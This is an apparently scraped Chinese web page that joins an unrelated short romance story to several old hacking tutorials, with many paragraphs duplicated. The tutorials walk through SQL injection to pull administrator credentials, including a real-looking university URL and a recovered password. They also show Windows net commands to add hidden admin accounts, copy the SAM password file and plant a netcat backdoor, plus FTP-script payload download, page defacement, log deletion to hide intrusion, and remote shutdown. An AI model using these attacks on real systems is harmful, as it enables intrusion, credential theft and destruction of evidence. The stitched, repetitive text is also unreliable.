Net·PoliCe

烛光晚餐。桌两边，坐了男人和女人。
　　“我喜欢你。”女人一边摆弄着手里的酒杯，一边淡淡的说着。
　　“我有老婆。”男人摸着自己的手上的戒指。
　　“我不在乎，我只想知道，你的感觉。你，喜欢我嘛？”
　　意料中的答案。男人抬起头，打量着对面的女人。24岁，年轻，有朝气，相当不错的年纪。
白皙的皮肤，充满活力的身体，一双明亮的，会说话的眼睛。真是不错的女孩啊，可惜。

烛光晚餐。桌两边，坐了男人和女人。
　　“我喜欢你。”女人一边摆弄着手里的酒杯，一边淡淡的说着。
　　“我有老婆。”男人摸着自己的手上的戒指。
　　“我不在乎，我只想知道，你的感觉。你，喜欢我嘛？”
　　意料中的答案。男人抬起头，打量着对面的女人。24岁，年轻，有朝气，相当不错的年纪。
白皙的皮肤，充满活力的身体，一双明亮的，会说话的眼睛。真是不错的女孩啊，可惜。
　　“如果你也喜欢我，我不介意作你的情人。”女人终于等不下去，追加了一句。
　　“我爱我妻子。”?男人坚定的回答。
　　“你爱她？爱她什么？现在的她，应该已经年老色衰，见不得人了吧。否则，公司的晚宴，怎么从来不见你带她来……”
　　女人还想继续，可接触到男人冷冷的目光后，打消了念头。
　　“你喜欢我什么？”男人开口了。
　　“成熟，稳重，动作举止很有男人味，懂得关心人，很多很多。反正，和我之前见过的人不同。你很特别。”
　　“你知道三年前的我，什么样子？”男人点了颗烟。
　　“不知道。我不在乎，即使你坐过牢。”
　　“三年前，我就是你现在眼里的那些普通男人。”男人没理会女人，继续说。
　　“普通大学毕业，工作不顺心，整天喝酒，发脾气。对女孩子爱理不理，靠**来发泄自己的欲求不满。还因为去夜总会找小姐，被**抓过。”
　　“那怎么？”女人有了兴趣，想知道是什么，让男人转变的。“因为她？”
　　“嗯。”
　　“她那个人，好像总能很容易就能看到事情的内在。教我很多东西，让我别太计较得失；别太在乎眼前的事；让我尽量待人和善。那时的我在她面前，就像少不更事的孩子。也许那感觉，就和现在你对我的感觉差不多。那时真的很奇怪，倔脾气的我，只是听她的话。按照她说的，接受现实，知道自己没用，就努力工作。那年年底，工作上，稍微有了起色，我们结婚了。”男人弹了弹烟灰，继续说着。"那时，真是苦日子。两个人，一张床，家里的家具，也少的可怜。知道吗？结婚一年，我才给她买了第一颗钻戒，存了大半年的钱呢。当然，是背着她存的。若她知道了，是肯定不让的。”
　　“那阵子，烟酒弄得身体不好。大冬天的，她每天晚上睡前还要给我熬汤喝。那味道，也只有她做得出。”
男人沉醉于那回忆里，忘记了时间，只是不停的讲述着往事。而女人，也丝毫没有打扰的意思，就静静地听着。等男人注意到时间，已经晚上10点了。
　　“啊，对不起，没注意时间，已经这么晚了。”男人歉意的笑了笑。
　　“现在，你可以理解嘛？我不可能，也不会，作对不起她的事。”
　　“啊，知道了。输给这样子的人，心服口服咯。”女人无奈地摇了摇头。“不过我到了她的年纪，会更棒的。”
　　“嗯。那就可以找到更好的男人。不是吗？很晚了，家里的汤要冷了，我送你回去。”男人站起身，想送女人。
　　“不了，我自己回去可以了。”女人摆了摆手。“回去吧，别让她等急了。”
　　男人会心的笑了笑，转身要走。
　　“她漂亮嘛？”
　　“。。。。。。。。。。。。。。嗯，很美。”
　　男人的身影消失在夜色中，留下女人，对着蜡烛。发呆。
　　男人回到家，推开门，径直走到卧室，打开了台灯。沿着床边，坐了下来。
　　“老婆，已经第四个了。干吗让我变成这么好，好多人喜欢我呀。搞不好，我会变心呀。干吗把我变成这么好，自己却先走了？我，我一个人，好孤单呀。”
　　男人哽咽的说着，终于泣不成声。眼泪，一滴滴的从男人的脸颊流下，打在手心里的相框上。昏暗的灯光中，旧照片里，弥漫着的，是已逝女子，淡淡的温柔。

一般国内的小一点的新闻站点程序 都有 ""&request 这种漏洞，下面我讲解攻击方法
在地址栏：

and 1=1

查看漏洞是否存在,如果存在就正常返回该页,如果没有,则显示错误，继续假设这个站的数据库存在一个admin表
在地址栏：
and 0<>(select count(*) from admin)

返回页正常,假设成立了。


一般国内的小一点的新闻站点程序 都有 ""&request 这种漏洞，下面我讲解攻击方法
在地址栏：

and 1=1

查看漏洞是否存在,如果存在就正常返回该页,如果没有,则显示错误，继续假设这个站的数据库存在一个admin表
在地址栏：
and 0<>(select count(*) from admin)

返回页正常,假设成立了。

下面来猜猜看一下管理员表里面有几个管理员ID：

and 1<(select count(*) from admin)

页面什么都没有。管理员的数量等于或者小于1个

and 1=(select count(*) from admin)

输入=1没显示错误，说明此站点只有一个管理员。

下面就是要继续猜测admin 里面关于管理员用户名和密码的字段名称。

and 1=(select count(*) from admin where len(username)>0)

猜解错误!不存在 username 这个字段。只要一直改变括号里面的username这个字段,下面给大家几个常用的
user,users,member,members,userlist,memberlist,userinfo,admin,manager,用户,yonghu


用户名称字段猜解完成之后继续猜解密码字段
and 1=(select count(*) from admin where len(password)>0)

password 字段存在！因为密码字段一般都是这个拉,如果不是就试试pass如果还不是就自己想想吧

我们已经知道了管理员表里面有3个字段 id,user,password。
id 编号
user 用户名
password 密码
下面继续的就是管理员用户名和密码的猜解了。一个一个来,有点麻烦,最好找个猜解机来

先猜出长度!

and 1=(select count(*) from admin where len(user)<10)

user 字段长度小于10

and 1=(select count(*) from admin where len(user)<5)

user 字段长度不小于5

慢慢的来,最后猜出长度等于6,请看下面,返回正常就说明猜解正确
and 1=(select count(*) from admin where len(user)=6)

下面猜密码,
and 1=(select count(*) from admin where len(password)=10)

猜出来密码10位,不要奇怪,现在网管都有防备的,所以密码上20位也不太奇怪了


下面该做的就是把他们拆开来一个一个猜字母
and 1=(select count(*) from admin where left(user,1)=a)
返回正常，第一位字母等于a,千万不要把大写和小写给搞错了哦~~呵呵,如果不a就继续猜其他的字符落,反正猜到返回正常就算OK了

开始猜解帐号的第二位字符。

and 1=(select count(*) from admin where left(user,2)=ad)

就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了

工作还没有完,别忙着跑了,还有10位密码,呵呵

and 1=(select count(*) from admin where left(password,1)=a)

经过无数次错误之后......
http://xyz.hytc.edu.cn/new2/article_view.asp?id=2499 and 1=(select count(*) from admin where left(password,10)=administra)

结果密码是administra 
看完文章,大家不要照着我的文章做,网络上的东西是变幻无穷的,但是我相信大家的大脑肯定比他变得快,所以希望大家看了这个文章灵活运用!那样才能达到理想的效果.

转载请注明出处

作者：Net·PoliCe
出处：http://www.cnsafe.org
『安全驿站』onLine Security DeFender

1：NET 
只要你拥有某IP的用户名和密码，那就用IPC$做连接吧！ 
这里我们假如你得到的用户是hbx，密码是123456。假设对方IP为127.0.0.1 
net use 127.0.0.1ipc$ 123456 /user:hbx              null密码为空 
退出的命令是 
net use 127.0.0.1ipc$ /delete 


转载请注明出处

作者：Net·PoliCe
出处：http://www.cnsafe.org
『安全驿站』onLine Security DeFender

1：NET 
只要你拥有某IP的用户名和密码，那就用IPC$做连接吧！ 
这里我们假如你得到的用户是hbx，密码是123456。假设对方IP为127.0.0.1 
net use 127.0.0.1ipc$ 123456 /user:hbx              null密码为空 
退出的命令是 
net use 127.0.0.1ipc$ /delete 

net share是查看主机共享资源我们用它建一个秘密共享目录吧net share me=c:winntsystem32 这样这个机器就有了一个名为me的共享目录，而打开它就是winnt下的system32目录，如果你用win2000的系统就知这个目录有多重要了，如果不想要也好办net share me /delete 呵呵，没有了，是不是很方便的啊。 

下面的操作你必须登陆后才可以用.登陆的方法就在上面. 
 
下面我们讲怎么创建一个用户，由于SA的权限相当于系统的超级用户. 
我们加一个heibai的用户密码为lovechina 
net user heibai lovechina /add 
只要显示命令成功，那么我们可以把他加入Administrator组了. 
net localgroup Administrators heibai /add 

这里是讲映*对方的C盘，当然其他盘也可以，只要存在就行了.我们这里把对方的C盘映*到本地的Z盘. 
net use z:127.0.0.1c$ 

net start telnet 
这样可以打开对方的TELNET服务. 

这里是将Guest用户激活，guest是NT的默认用户，而且无法删除呢？不知道是否这样，我的2000就是删除不了它。 
net user guest /active:yes(特别注意:这个命令是把原来被禁用的guest帐户再次激活)

net user guest /active:no这样这个guest的用户就又被禁用了 

这里是把一个用户的密码改掉，我们把guest的密码改为lovechina，其他用户也可以的。只要有权限就行了呀！ 
net user guest lovechina 
有人问到提高权限的问题 下面就解决下 
net localgroup administrators guest /add 
将guest变为administrator 
net命令果然强大啊！ net view命令看对方开了共享 

net user是查看所有用户列表，看看哪个用户是和你一样偷跑进来的，给他名给删掉，让他美， 
net user 用户名 /delete哈哈,他没有了,管他什么是不是管理员呢,不过我们还是查一下管理员组有什么用户吧,这样的用户才对我们有用嘛 net localgroup administrators就列出管理员组成员了,再查看一下administrator这个用户，因为这个是创建系统时建出来的，所以要看看他的系统是什么时间创建出来的 
net user administrator，然后再查看别的管理员用户是什么时间创建的，如果相差太远，那可能是被别人偷偷跑来偷建的，一律del，安全第一哦.

2:at 
一般一个入侵者入侵后都会留下后门，也就是种木马了，你把木马传了上去，怎么启动他呢？ 
那么需要用AT命令，这里假设你已经登陆了那个服务器。 

你首先要得到对方的时间， 
net time 127.0.0.1 
 
将会返回一个时间，这里假设时间为12:1，现在需要新建一个作业，其ID=1 
at 127.0.0.1 12:3 nc.exe 
这里假设了一个木马，名为NC.EXE，这个东西要在对方服务器上. 
这里介绍一下NC，NC是NETCAT的简称，为了方便输入，一般会被改名.它是一个TELNET服务，端口为99. 
等到了12:3就可以连接到对方的99端口.这样就给对方种下了木马. 
 
at命令功能强大,下面可以打个比方: 
C:> AT 22:30 Start C:prettyboy.mp3   
新加了一项作业，其作业 ID = 1 [现在我们新建立了一个任务 在22:30分 系统将自动播放歌曲] 

3:telnet 
这个命令非常实用，它可以与远方做连接，不过正常下需要密码、用户，不过你给对方种了木马，直接连到这个木马打开的端口. 
telnet 127.0.0.1 99 
这样就可以连到对方的99端口.那你就可以在对方运行命令了，这个也就是肉鸡. 

4:FTP 
它可以将你的东西传到对方机子上，你可以去申请个支持FTP上传的空间，国内多的是，如果真的找不到，我给WWW.51.NET，不错的.当我们申请完后，它会给用户名，密码，以及FTP服务器. 
在上传前需要登陆先，这里我们假设FTP服务器WWW.51.NET，用户名是HUCJS，密码是654321 
ftp www.51.net 
他会要求输入用户，成功后会要求输入密码. 

下面先说上传，假设你需上传的文件是INDEX.HTM，它位于C:下，传到对方D: 
get c:index.htm d: 
假设你要把对方C盘下的INDEX.HTM，下到你的机子的D盘下 
put c:index.htm d: 

这里的问题是两个命令的解释正好弄反了，登陆ＦＴＰ服务器后get才是下载，而put命令是上传，这和tftp的命令正好相反，在tftp命令里get是上传put是下载，这下明白了吧，而且在ＦＴＰ服务器中不能用c:和d:这样来指明路径，这也是在tftp里面用的方法，FTP可不会执行的，不信你去试好了，正确应该这样上传文件put index.htm这样就足够了，装c盘根目录下的index.htm文件上传到FTP服务器的当前目录下，不喜欢就del index.htm删掉这文件，下载时先查看一下目录，dir然后看这个目录里有什么，有你要的你就get index.htm这样就把index.htm这个文件下载到你自己的c盘根目录下了。 

get index.htm c:inetpubwwwrootindex.htm（这里是把你空间上的index.htm下载到对方的c:inetpubwwwrootindex.htm）" 

5:copy 
下面我说说怎样把本地的文件复制到对方硬盘上去，           需要建立好IPC$连接才有效。 
这里我们把本地C盘下的index.htm复制到127.0.0.1的C盘下 
copy index.htm 127.0.0.1c$index.htm 

如果你要复制到D盘下  把C改为D，  就行了！ 
copy index.htm 127.0.0.1d$index.htm 

如果你要把他复制到   WINNT   目录里 
就要把输入 
copy index.htm 127.0.0.1admin$index.htm 
admin$是winnt 

要把对方的文件复制过来，顺便告诉大家  NT的备份的数据库放在x:winnt epairsam._ sam._是数据库的文件名 

下面就把127.0.0.1的数据库复制到本地C盘下 
copy 127.0.0.1admin$ epairsam._ c: 
这个sam._这明显是NT主机的口令档，如果是win2000机器的口令文件应该是sam 
 
6：set 
如果你跑进了一部机子，而且想黑他（这思想只能在特别时候才准有），当然他的80端口要开，不然你黑给谁看。这时需要用SET命令！ 

下面是我得到的结果！我来分析它，只是找主页在那而已。 

COMPUTERNAME=PENTIUMII 
ComSpec=D:WINNTsystem32cmd.exe 
CONTENT_LENGTH=0 
GATEWAY_INTERFACE=CGI/1.1 
HTTP_ACCEPT=*/* 
HTTP_ACCEPT_LANGUAGE=zh-cn 
HTTP_CONNECTION=Keep-Alive 
HTTP_HOST=当前登陆者的IP，这里本来是显示我的IP，被我删除了 
HTTP_ACCEPT_ENCODING=gzip， deflate 
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt) 
NUMBER_OF_PROCESSORS=1 
Os2LibPath=D:WINNTsystem32os2dll; 
OS=Windows_NT 
Path=D:WINNTsystem32;D:WINNT 
PATHEXT=.COM;.EXE;.BAT;.CMD 
PATH_TRANSLATED=E:vlroot主页放在的地址，只要你看到PATH_TRANSLATED=的后面就是主页的存放地址。这里是E:vlroot 
PROCESSOR_ARCHITECTURE=x86 
PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3， GenuineIntel 
PROCESSOR_LEVEL=6 
PROCESSOR_REVISION=0303 
PROMPT=$P$G 
QUERY_STRING=/c+set 
REMOTE_ADDR=XX.XX.XX.XX 
REMOTE_HOST=XX.XX.XX.XX 
REQUEST_METHOD=GET 
SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe 
SERVER_NAME=XX.XX.XX.XX 
SERVER_PORT=80 
SERVER_PORT_SECURE=0 
SERVER_PROTOCOL=HTTP/1.1 
SERVER_SOFTWARE=Microsoft-IIS/3.0对方使用IIS/3.0 
SystemDrive=D: 
SystemRoot=D:WINNT 
TZ=GMT-9 
USERPROFILE=D:WINNTProfilesDefault User 
windir=D:WINNT 

粉红色的那行就是对方主页存放地址，这里告诉大家一个技巧，很笨的技巧啊，不过只能用这个方法才能100%的找到主页的名称，当你DIR这个目录时，一定会看到很多文件，你可以把所有文件在浏览器这样输入XX.XX.XX.XX/文件名，这样只要看到和XX.XX.XX.XX看到的也面一模一样，那么这就是主页的名称了。 

7：nbtstat 
如果你扫到一部NT的机子，他的136到139其中一个端口开了的话，就要用这个命令得到用户了。顺便告诉大家这是netbios，得到用户名后就可以猜猜密码了。例如比较简单的密码，密码和用户名一样的，都试下，不行就暴力破解吧！ 
现在网上很多NT的机子都开了这些端口的，你可以练习下，我们来分析得到的结果。 
命令是 
nbtstat -A XX.XX.XX.XX 
-A一定要大写哦。 
这个我认为大不大写没有太大差别，用处还是一样的。 
之后用net use 对方IP  连接一下！ 
net view 对方IP  查看对方共享文件夹 
net use X: IP对方共享文件    映*对方共享文件夹成为本机的X盘 
这就是139端口的基本用法！不过前提是必须对方开共享！ 
netstat -n看看谁连接你 

 下面是得到的结果。 
NetBIOS Remote Machine Name Table 
Name Type Status 

Registered Registered Registered Registered Registered Registered Registered Reg 
istered Registered Registered Registered 
MAC Address = 00-E0-29-14-35-BA 
PENTIUMII <00> UNIQUE 
PENTIUMII <20> UNIQUE 
ORAHOTOWN <00> GROUP 
ORAHOTOWN <1C> GROUP 
ORAHOTOWN <1B> UNIQUE 
PENTIUMII <03> UNIQUE 
INet~Services <1C> GROUP 
IS~PENTIUMII...<00> UNIQUE 
ORAHOTOWN <1E> GROUP 
ORAHOTOWN <1D> UNIQUE 
..__MSBROWSE__.<01> GROUP 


粉红色的就是登陆过这部系统的用户，可能你不知道怎么看，大家是不是看到了一窜数字，只要这窜数字是  <03>  的话，那他前面的就是用户.    这里的用户是PENTIUMII。 
没有03说明:MAC没和IP捆在一起了 

8：Shutdown 
关了对方的NT服务器的命令 
Shutdown IP地址 t:20 
20秒后将NT自动关闭，三思后才能运行这个命令，这样对对方造很大的损失，要做个有良心的入侵者呀。 
Telnet进去用命令或者是本地用什么软件重启对方电脑 
shutdown -m 计算机名称  可以远程重起或关闭的 
 
9：DIR 
这个命令没什么好讲，但是却非常重要，他是查看一目录里的所有文件、文件夹。 
你可以本地试下。 

10：echo 
著名的漏洞Unicode，这个命令可以简单的黑一下有这个漏洞的主机。 
我们假设我们要把“南京大屠杀铁证如山，任何日本人不得抵赖！”写入index.htm，有2种方法，大家看看有什么区别。 

echo 南京大屠杀铁证如山，任何日本人不得抵赖！>index.htm 
echo 南京大屠杀铁证如山，任何日本人不得抵赖！>>index.htm 

第一个的意思是覆盖index.htm原有的内容，把“南京大屠杀铁证如山，任何日本人不得抵赖！”写进index.htm。 
第二个的意思是把“南京大屠杀铁证如山，任何日本人不得抵赖！”加到index.htm里面。 

“>>”产生的内容将追加进文件中，“>”则将原文件内容覆盖。 

这里说明一下，<和>是重定向命令只是一个是输入重定向另一个是输出重定向，比如我们在命令提示符下就会显示c:>这个意思就是把C盘的命令权重定向给我们，同样：也是定向的命令也叫作管道，它是用来连接两个命令的管道，先执行管道左边的命令，再执行管道右边的命令，不过我是没能耐把DOS命令说明白的，想研究就买本dos大全看吧，够看半年的了。 

大家可以本地试下。 
可能你会问，这样简单黑下有什么好玩的，其实他可以用来下载主页到对方的目录里。 
1、首先，我们需要申请一个免费的主页空间。 
2、用echo在可写目录下建立如下内容的txt文件：（以chinren服务器为例。） 
open upload.chinaren.com（你的FTP服务器，申请时你的空间提供商会给你的） 
cnhack（你申请时的用户名） 
test（你申请时的密码） 
get index.htm c:inetpubwwwrootindex.htm（这里是把你空间上的index.htm下载到对方的c:inetpubwwwrootindex.htm） 
bye（退出FTP对话，相当在98下的DOS，用EXIT退出DOS） 
 
具体的做法： 
输入 echo open upload.chinaren.com> c:cnhack.txt 
输入 echo cnhack >> c:cnhack.txt 
输入 echo 39abs >> c:cnhack.txt 
输入 echo get index.htm c:inetpubwwwrootindex.htm+>>+c:cnhack.txt 
最后输入 ftp -s:c:cnhack.txt （利用ftp的-s参数，执行文件里的内容。） 
等命令完成时，文件已经下载到你指定的文件里了。 

  注意：取得文件后，请删除cnhack.txt。（如果不删除，很容易会给别人看到你的密码。） 
记得要 del c:cnhack.txt 

11:attrib 
这个命令是设置文件属性的。如果你想黑一个站，而他的主页的文件属性设置了只读，那就很可怜呀，想删除他也不行，想覆盖他也不行。倒！不过有这个命令就别怕了。 
attrib -r index.htm 
这个命令是把index.htm的只读属性去掉。 
如果把“-”改为“+”则是把这个文件的属性设置为只读 

attrib +r index.htm 
这个命令是把index.htm的属性设置为只读。 

attrib这个命令先要用来查属性，比如attrib 文件名，这样就显示出这个文件的属性了，它不止有R这个属性，其实一共有四种属性， a 档案属性 r 只读属性 h隐含属性 s系统属性，我们想用哪个就用哪个，我觉得把我们上传的文件加个隐含属性更有意思.

12:del 
当你看到这个标题可别倒下啊！现在要离开127.0.0.1了，要删除日志，当然要删除日志啦！想被捉吗。呵呵。 
NT的日志有这些 
del C:winntsystem32logfiles*.* 
del C:winntssytem32config*.evt 
del C:winntsystem32dtclog*.* 
del C:winntsystem32*.log 
del C:winntsystem32*.txt 
del C:winnt*.txt 
del C:winnt*.log 
只要删除这些就可以了。有些系统NT安装在D盘或其他盘，就要把C改成其他盘。 
Internet信息服务FTP日志默认位置：%systemroot%system32logfilesmsftpsvc1，默认每天一个日志 
Internet信息服务WWW日志默认位置：%systemroot%system32logfilesw3svc1，默认每天一个日志 
Scheduler服务日志默认位置：%systemroot%schedlgu.txt 
以上日志在注册表里的键： 
应用程序日志，安全日志，系统日志，DNS服务器日志，它们这些LOG文件在注册表中的： 
HKEY_LOCAL_MACHINESystemCurrentControlSetServicesEventlog 
有的管理员很可能将这些日志重定位。其中EVENTLOG下面有很多的子表，里面可查到以上日志的定位目录。 
Schedluler服务日志在注册表中 
HKEY_LOCAL_MACHINESOFTWAREMicrosoftSchedulingAgent 

del确实是删除文件用的，log也确实是日志文件类型，不过按上面这种方法是不可能清理掉你自身的日志的，因为系统自动运行着日志记录，你在做这些时它一直都在记录着，并没有停止，大家也会常看到，有时删除某个文件时会提示系统正在占用拒绝删除的，呵呵，这就明白了，系统正在运行的东西已经驻留内存里，当然不能这样删除掉了，大家怕了吧，这样删等于帮别人清理了日志，没删自己那份啊，哈哈哈哈，要问我怎么清理，我只说大家还是用小榕的工具来清吧，那个又快又好，我们何必去用那些烦琐的命令行呢，尤其对生长在windows桌面操作下的人们那显然是太麻烦了，我推荐小榕的elsave工具.

借助第三方工具：如小榕的elsave.exe远程清除system,applicaton,security的软件， 
使用方法很简单，首先利用获得的管理员账号与对方建立ipc会话，net use ip pass /us 
er: user 
然后命令行下：elsave -s ip -l application -C，这样就删除了安全日志。 
其实利用这个软件还可以进行备份日志，只要加一个参数 -f filename就可以了，在此不再详述。 


局域网要别人死机? 他C盘开了共享的话(win98,而且没有打补丁),你在DOS下输入 
他的IP或机器名concon

网上有很多高手GG们写的利用SQL注入如何去黑网站的，偶看了，嘿嘿。
不过可能对于一些初学者而且，有点难。在这里，小林想把这个过时的
东东作一次全面的交待，尽量让没有编程基础的DDMM们很快的拿握这门技术。
利用SQL进行添加，更改，查看记录。


网上有很多高手GG们写的利用SQL注入如何去黑网站的，偶看了，嘿嘿。
不过可能对于一些初学者而且，有点难。在这里，小林想把这个过时的
东东作一次全面的交待，尽量让没有编程基础的DDMM们很快的拿握这门技术。
利用SQL进行添加，更改，查看记录。

当一台主机台开了80端口，当你手头没有任何黑客工具，那么，偶们有SQL。
他不需要你其他东东，只要一个浏览器就够了。HOHO，偶的文章菜菜，偶写这
篇文章只是为了让一些对SQL很陌生的菜菜们看的，老鸟绕道。。。

1，什么是SQL注入？

SQL注入，就是利用欺骗的方式，通过网页的查询功能，或查询命令注入。
当用户来到网站，会提交一些数据，再到数据库进行查询，确定此用户的身份。
举个简单的例子来说吧，你去一个站点的论坛，那么，你会输入你的用户名和
密码，点“确定”，网站会通过数据库的查询来判断你是不是他们的用户，
你的用户名和密码是否正确。而利用SQL注入，通过构造特殊的语句，来查找我
们所想要得到的信息，如管理员的帐号密码。以下，小林用了http://xxx.xxx.com
来表示一个存在注入漏洞的网页。


2，助手篇，
先把IE菜单-工具-Internet选项-高级-显示友好 HTTP 错误信息前面的勾去掉。
否则，不论服务器返回什么错误，我们都只能看到“HTTP 500服务器错误”，不能获得更多的提示信息

。


3，哪些网页能利用？
我们去找一些要提交数据的网页，如：登陆页面，查找页面，添加页面等
找到后，如果你注意过网页的源代码，那么，你会发现，他上面一般有一个如下的表单：

这些网页，后缀如asp,jsp,cgi，php网页。
如：http://xxx.xxx.com/index.asp?id=10
上面这个例子，就是ASP页后，看到他的ID还的值了吗？是10。一般，我们找的就是这些页面
来练手了。（要做个好人噢。（^_^）像小林一样的好人。）

4，怎么测试它是存在注入漏洞的呢？这一步偶称它为“踩点”。
小林有一个毛病，看什么网页，就要顺手在参数（如上面的10）上加一个小小的引号。
http://xxx.xxx.com/index.asp?id=10
返回错误信息：

Microsoft OLE DB Provider for SQL Server 错误 80040e14

字符串 之前有未闭合的引号。

/job/grxx.asp，行141

这就是说，他用的是MsSQL数据库。这个引号，导致引号未闭合的错误。本身就是错的，因为
通常一个整数是不用在SQL里加引号的。

如果他不是一个整数而是字母呢？

http://xxx.xxx.com/index.asp?user=lamb

那我们就把引号放到lamb中间，如lamb
呵呵，又出错了吧？

这说明，站点这一部分的代码是大有问题的（当然，就算他有源码公布在网上，我也懒得看）

当然，我们也可以提交：
http://xxx.xxx.com/index.asp?id=10 ;AND columnaaa=5 (注，这里的columnaaa是我乱写的)
出现错误信息：

Microsoft OLE DB Provider for ODBC Drivers 错误 80040e14

[Microsoft][ODBC SQL Server Driver][SQL Server]Invalid column name columnaaa.

/job/grxx.asp，行27
这说明，这是一个SQL，里面没有columnaaa这个字段（我习惯说“列”）。

利用出错的信息，我们现在多少了解了这个站点的服务了吧？

5，现在开工啦，偶不喜欢猜测他的字段名，太浪费TIME了，我们要想办法让数据查询中出错。
要产生一个错误让它自己报出数据库里的值。让我们用一用SQL语法GROUP BY 或HAVING。如：

http://xxx.xxx.com/job/grxx.asp?id=23%20HAVING%201=1--

出现错误信息：
Microsoft OLE DB Provider for ODBC Drivers 错误 80040e14

[Microsoft][ODBC SQL Server Driver][SQL Server]Column article.newsid is invalid in the

select list because it is not contained in an aggregate function and there is no GROUP BY

clause.

/more.asp，行27

看到article.newsid了吗？说明有一个叫article.newsid的列，因为你在用HAVING，所以你必须还要用

上GROUP BY，于是黑客就重复错误提交，直到没有得到错误。
这里要说明一下：分号在这里分离，%20 是空格，--表示后面是一个注释，也就是说只是说明，不能去

执行代码。(*_*)

下面是具体例子：

提交：
http://xxx.xxx.com/job/grxx.asp?id=23%20HAVING%201=1--
得到article.newsid这真是好东西。
提交：
http://xxx.xxx.com/job/grxx.asp? ... id%20having%201=1--
得到错误信息：
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)

[Microsoft][ODBC SQL Server Driver][SQL Server]Column article.title is invalid in the

select list because it is not contained in either an aggregate function or the GROUP BY

clause.

/more.asp，line 20

得到：
article.title
我们反复地一个一个加上来提交。
得到错误信息：
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)

[Microsoft][ODBC SQL Server Driver][SQL Server]Column adm.userName is invalid in the

select list because it is not contained in either an aggregate function or the GROUP BY

clause.

/more.asp，line 56

这里要注意了，都到哪儿了？到下一个表了。
现在我们知道这里至少有2个表，他们的别名是：adm和article，如里面article对应的是：newsid等

title

利用系统表：

下面，我们要确定表名来加入数据。
系统表是MS-SQL 2000的一部分，名叫sysObjects table，我们将要用到查询UNION SELECT,。
要从SysObjects table 有天地拿到表名，一般使用下面语句：
SELECT name FROM sysObjects WHERE xtype=U U是指明定议USER的表。
黑客们已经知道了表里的列，
现在他们能在下面加一些数字。甚至如下面的：

在地址栏里打入：

http://xxx.xxx.com/job/grxx.asp?id=23%20UNION%20ALL%20SELECT% ;
201,2,3,4,5,6,name%20FROM%20sysObjects%20WHERE%20xtype=U--
记住，上面的，1-6数据中，6是我们想要的。不过有时候会出现数据类型错误，

http://xxx.xxx.com/job/grxx.asp?id=23%20SELECT ;TOP 1 TABLE_NAME FROM

INFORMATION_SCHEMA.TABLES--

MS SQL服务将试图去转换一个string (nvarchar)到integer。那么就会出错：

Microsoft OLE DB Provider for ODBC Drivers error 80040e07
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value

table1 to a column of data type int.
/index.asp, line 5

这个错误信息很“友好”地告诉我们string (nvarchar)值不能被转换成integer。
这样，我们就获得了数据表的第一个表名！这个表名就是tabel1。


要获得第二个表名，我们继续，用以下查询：
http://xxx.xxx.com/job/grxx.asp?id=23%20UNION ;SELECT TOP 1 TABLE_NAME FROM

INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN (table1)--

也可以用关键字查找数据：
http://xxx.xxx.com/job/grxx.asp?id=23 ;UNION SELECT TOP 1 TABLE_NAME FROM

INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE %25ADMIN%25--
现在错误信息：
Microsoft OLE DB Provider for ODBC Drivers error 80040e07
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value

admin_login to a column of data type int.
/index.asp, line 5

寻找与之匹配的值，%25ADMIN%25在SQL服务器上将被认作 %ADMIN%。这样，我们就能获得符合标
准的表名为"admin_login"的表了。

那么，如何获得表里所有的列表？

我们能利用另一个有用的东东，INFORMATION_SCHEMA.COLUMNS 出场！！！
http://xxx.xxx.com/job/grxx.asp?id=23 ;UNION SELECT TOP 1 COLUMN_NAME FROM

INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=admin_login--

现在错误信息：
Microsoft OLE DB Provider for ODBC Drivers error 80040e07
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value

u_id to a column of data type int.
/index.asp, line 6
看，我们有了第一个字段的名，我们用NOT IN () 来获得下一个字段名：
http://xxx.xxx.com/job/grxx.asp?id=23 ;UNION SELECT TOP 1 COLUMN_NAME FROM

INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=admin_login WHERE COLUMN_NAME NOT IN

(u_id)--
现在错误信息：
Microsoft OLE DB Provider for ODBC Drivers error 80040e07
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value

u_name to a column of data type int.
/index.asp, line 5
我们继续，获得其他列表。如："password"等，因为我们获得下面错误信息：
http://xxx.xxx.com/job/grxx.asp?id=23 ;UNION SELECT TOP 1 COLUMN_NAME FROM

INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=admin_login WHERE COLUMN_NAME NOT IN

(u_id,u_name,password,contents)--
现在错误信息：
Microsoft OLE DB Provider for ODBC Drivers error 80040e14
[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select

list if the statement contains a UNION operator.
/index.asp, line 5
6。2 如何找到我们要找的重要数据呢？
现在我们知道了表名，字段名，我们用相同的方法收集我们要的在数据库里的信息。
现在，我们从"admin_login" 表里取得第一个u_name ：
http://xxx.xxx.com/job/grxx.asp?id=23 ;UNION SELECT TOP 1 u_name FROM admin_login--
现在错误信息：
Microsoft OLE DB Provider for ODBC Drivers error 80040e07
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value

adminroot to a column of data type int.
/index.asp, line 5

我们知道，这里有登陆的用户名叫 "adminroot"的管理员。最后，从数据库里获得"adminroot" 的密码

：
http://xxx.xxx.com/job/grxx.asp?id=23 ;UNION SELECT TOP 1 password FROM admin_login where

u_name=adminroot--
现在错误信息：
Microsoft OLE DB Provider for ODBC Drivers error 80040e07
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value

root to a column of data type int.
/index.asp, line 5
我们现在能用户名"adminroot"密码："root"登陆了。


如何取得数字的值？

以上技术描述有有一定的局限性。当我们试图转换文本组成有效的数字0-9我们不能得到任何错误。
让我们说说如何获得"tony"的密码，密码是 "19840217":
